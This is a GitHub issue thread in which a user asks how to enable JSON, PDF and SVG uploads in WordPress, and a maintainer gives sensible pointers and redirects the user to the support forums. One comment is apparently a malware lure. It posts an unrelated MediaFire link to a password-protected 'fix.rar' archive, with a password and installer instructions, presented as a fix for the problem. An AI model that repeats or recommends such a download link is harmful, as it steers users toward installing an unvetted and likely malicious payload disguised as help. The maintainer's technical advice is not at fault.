### ISSUE TITLE
Guidance on Enabling JSON, PDF and SVG Uploads in WordPress

### ISSUE THREAD

**Issue by aminul-xs** [WordPress/performance#1508]
Hi WordPress Performance Team,

I am seeking guidance on enabling the upload of JSON, PDF and SVG files in WordPress. This functionality is essential for integrating custom features and assets into our WordPress sites. Specifically, I would like to understand:

1 Current Status: Is there a built-in method or recommended approach for enabling JSON, PDF and SVG file uploads in WordPress? If so, could you please provide details or point me to the relevant documentation?

2 Best Practices: Are there any best practices or security considerations that should be taken into account when allowing these file types? For instance, are there any specific configurations or plugins that are recommended for secure and reliable JSON, PDF and SVG file handling?

3 Future Enhancements: Are there any planned updates or enhancements related to file uploads in the near future that might impact the handling of JSON, PDFand SVG files?

Thank you for your time and assistance. I look forward to your response.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by swissspidy** [comment]
Hi there,

I don't see how this is performance related, nor do we really offer support here.

This kind of question is better asked in the [WordPress support forums](https://wordpress.org/support) or [WPSE](https://wordpress.stackexchange.com/).

That said:

* WordPress supports uploading PDFs just fine. Just give it a try.
* SVGs are not supported by default for security reasons, but there are plugins like [Safe SVG](https://wordpress.org/plugins/safe-svg/) to add support in a safe way
* JSON files are not supported by default either, but can be added using the `upload_mimes` filter. There might also be a plugin for that.

For further questions please use the forums :)
